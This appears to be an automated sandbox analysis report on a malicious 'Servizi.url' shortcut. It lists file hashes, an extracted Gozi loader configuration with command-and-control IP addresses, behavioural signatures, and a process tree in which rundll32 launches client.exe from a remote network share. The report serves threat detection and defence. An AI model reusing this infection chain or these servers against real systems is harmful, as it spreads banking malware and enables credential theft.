Analysis
-
max time kernel
150s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
03-10-2023 05:50
Static task
static1
Behavioral task
behavioral1
Sample
Servizi.url
Resource
win7-20230831-en
General
-
Target
Servizi.url
-
Size
192B
-
MD5
aa05bdf7862a64f54d6e281944fb0f51
-
SHA1
60fe537372be17e284f0121f5da307325da6ca92
-
SHA256
e798fb0280fbc91cbb32234af0c55c4c6e16f528f8282057e334c2055ac07d13
-
SHA512
e471d9b97fc022e3a769a936f37590da9e3f32e76fb5934ffea91ef8c1fb39f719330cb5299fbb38272bb5b34aac8e28ab05bc2180478eb1bca839911a87a302
Malware Config
Extracted
gozi
Extracted
gozi
5050
46.8.210.250
31.41.44.9
185.247.184.139
62.72.33.155
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Signatures
-
Dave packer 1 IoCs
Detects executable using a packer named 'Dave' by the community, based on a string at the end.
Processes:
resource yara_rule behavioral2/memory/3884-1-0x0000000001380000-0x000000000138C000-memory.dmp dave -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
rundll32.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
rundll32.exedescription pid process target process PID 3016 wrote to memory of 3884 3016 rundll32.exe client.exe PID 3016 wrote to memory of 3884 3016 rundll32.exe client.exe PID 3016 wrote to memory of 3884 3016 rundll32.exe client.exe
Processes
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Servizi.url1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3016 -
\??\UNC\62.173.146.43\scarica\client.exe"\\62.173.146.43\scarica\client.exe"2⤵PID:3884